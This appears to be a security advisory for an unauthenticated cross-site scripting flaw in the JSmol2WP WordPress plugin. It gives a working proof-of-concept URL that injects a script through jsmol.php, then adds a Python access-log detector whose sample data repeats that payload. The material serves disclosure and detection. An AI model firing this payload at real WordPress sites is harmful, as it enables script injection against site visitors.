JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
Description
The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
Proof of Concept
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert(/xss/)%3C/script%3E&mimetype=text/html;%20charset=utf-8
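Added example (not part of the original README or the plugin's code): an access-log check for the request pattern in the proof of concept above, flagging calls to jsmol.php with call=saveFile whose mimetype a browser renders as active content or whose data parameter carries markup. The combined log format, the MIME-type list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path suffix of the endpoint used in the proof of concept.
ENDPOINT = "/wp-content/plugins/jsmol2wp/php/jsmol.php"
# MIME types a browser renders as active content (assumed list, extend as needed).
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml", "text/xml"}
MARKUP = re.compile(r"<\s*[a-zA-Z!/]")
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(target):
    """Return the reasons a request target matches the PoC pattern (empty if none)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT):
        return []
    # parse_qs percent-decodes the values before they are inspected.
    q = parse_qs(parts.query, keep_blank_values=True)
    if "savefile" not in [v.lower() for v in q.get("call", [])]:
        return []
    reasons = []
    for mt in q.get("mimetype", []):
        base = mt.split(";", 1)[0].strip().lower()  # drop "; charset=..."
        if base in ACTIVE_TYPES:
            reasons.append("active mimetype: " + base)
    if any(MARKUP.search(d) for d in q.get("data", [])):
        reasons.append("markup in data")
    return reasons


def scan(lines):
    """Yield (line_number, reasons) for each flagged access-log line."""
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        reasons = classify(m.group(1)) if m else []
        if reasons:
            yield n, reasons


# Constructed sample log lines (not real traffic).
SAMPLE = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3Cscript%3Ealert(/xss/)%3C/script%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1" 200 41 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/jsmol2wp/php/jsmol.php?call=saveFile&data=C%2012.0&mimetype=text/plain HTTP/1.1" 200 6 "-" "-"',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?call=saveFile&mimetype=text/html HTTP/1.1" 200 512 "-" "-"',
]
if __name__ == "__main__":
    for n, reasons in scan(SAMPLE):
        print(n, reasons)
```

Parameters sent in a POST body do not appear in the access log, so this check only covers requests that carry them in the query string.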
References
https://wpscan.com/vulnerability/0bbf1542-6e00-4a68-97f6-48a7790d1c3e